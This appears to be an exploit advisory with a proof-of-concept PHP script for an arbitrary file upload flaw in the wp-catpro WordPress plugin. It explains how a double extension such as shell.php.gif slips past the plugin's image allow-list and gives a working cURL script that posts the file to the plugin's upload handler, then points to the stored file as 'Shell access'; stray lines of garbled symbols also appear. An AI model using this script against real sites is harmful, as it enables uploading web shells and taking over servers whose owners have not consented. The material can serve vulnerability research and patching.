WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
& Y' R- U+ k8 M1 \2 J# s 5 i7 Y; l+ K( F% |, ^* U
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
" q% G. q- W- c! w+ C
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif（注意：上传的 .php.gif 能否被当作 PHP 执行取决于目标服务器配置——例如 Apache 通过 AddHandler/AddType 按文件名中任意位置的 .php 匹配处理器时会执行；只匹配结尾 .php 的配置，如 `<FilesMatch "\.php$">`，则会把它当作普通图片返回）
# ("jpg", "gif", "png") // Allowed file extensions — apparently only the trailing extension is checked, so a double extension such as shell.php.gif passes
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) — note that "." is permitted, so a multi-extension name such as shell.php.gif is not rejected by this filter
------------------
1 R2 t2 G" m' H: Y3 w
#=> Exploit
-----------
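<?php
// PoC: arbitrary file upload in the wp-catpro WordPress plugin via its bundled
// SWFUpload handler (wp-content/plugins/wp-catpro/js/swfupload/js/upload.php).
//
// The handler's extension allow-list ("jpg", "gif", "png") is satisfied by a
// double extension such as zik.php.gif. Whether the stored file is then
// executed as PHP depends on the target's web-server configuration (e.g.
// Apache mapping ".php" anywhere in the name via AddHandler/AddType); a server
// that only matches a trailing ".php" will serve it as a plain image.
//
// Usage: set $target and $uploadfile, then run `php exploit.php`.
// The handler's raw response is printed because the stored file name (shown
// below as random_name.php.gif) is presumably returned in it — verify against
// the plugin's upload.php.

// Base URL of the WordPress install under test (no trailing slash).
$target = 'http://[target]/[path]';
// Local file to upload; its contents are the payload (e.g. <?php phpinfo(); ?>).
$uploadfile = "zik.php.gif";
// Destination directory the handler is asked to write into.
// NOTE(review): if upload.php uses this field without normalisation it is also
// a path-traversal vector — confirm against the handler source.
$folder = '/wp-content/uploads/catpro/';

if (!is_readable($uploadfile)) {
    fwrite(STDERR, "Cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target . '/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php');
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the legacy "@filename" form, which is disabled by
// CURLOPT_SAFE_UPLOAD (the default since PHP 5.6) and removed in PHP 7: with
// the old form the server receives the literal string, not the file contents.
// The declared image/gif type is optional — the original PoC did not send one —
// but it costs nothing if the handler also inspects the client-supplied type.
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'Filedata' => new CURLFile($uploadfile, 'image/gif', basename($uploadfile)),
    'folder'   => $folder,
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport errors instead of silently printing an empty body.
    fwrite(STDERR, 'curl error: ' . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
curl_close($ch);

print "$postResult";

// Shell access (file name as stored by the handler):
//   http://[target]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>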
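<?php
// Payload body: presumably the contents of the uploaded zik.php.gif (the
// listing gives no other source for it — confirm). phpinfo() is a harmless
// execution check: if the "Shell Access" URL renders the PHP configuration
// page, the double-extension file is being executed as PHP by the server.
phpinfo();
?>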